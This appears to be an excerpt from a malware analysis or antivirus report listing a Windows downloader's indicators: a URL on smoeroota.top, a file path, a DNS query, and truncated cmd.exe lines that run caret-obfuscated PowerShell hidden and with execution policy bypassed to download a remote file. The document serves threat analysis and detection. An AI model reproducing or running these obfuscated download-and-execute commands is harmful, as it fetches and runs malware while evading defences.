Technical Information
- http://smoeroota.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OWeRShe^lL^.E^x^E ^-^eX^ECutiOnp^ol^icY bypA^s^s ^-NoPro^fIl^E^ ^-WI^ndOWSTyLE HiD^d^En ^(neW^-o^B^Jec^T sY^ST^em^.NET^.w^e^bC^L^ieNT).^d^owN^L^OA^DFiL^E^('http://s...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "p^OWeRShe^lL^.E^x^E ^-^eX^ECutiOnp^ol^icY bypA^s^s ^-NoPro^fIl^E^ ^-WI^ndOWSTyLE HiD^d^En ^(neW^-o^B^Jec^T sY^ST^em^.NET^.w^e^bC^L^ieNT).^d^owN^L^OA^DFiL^E^('http://s...' (with hidden window)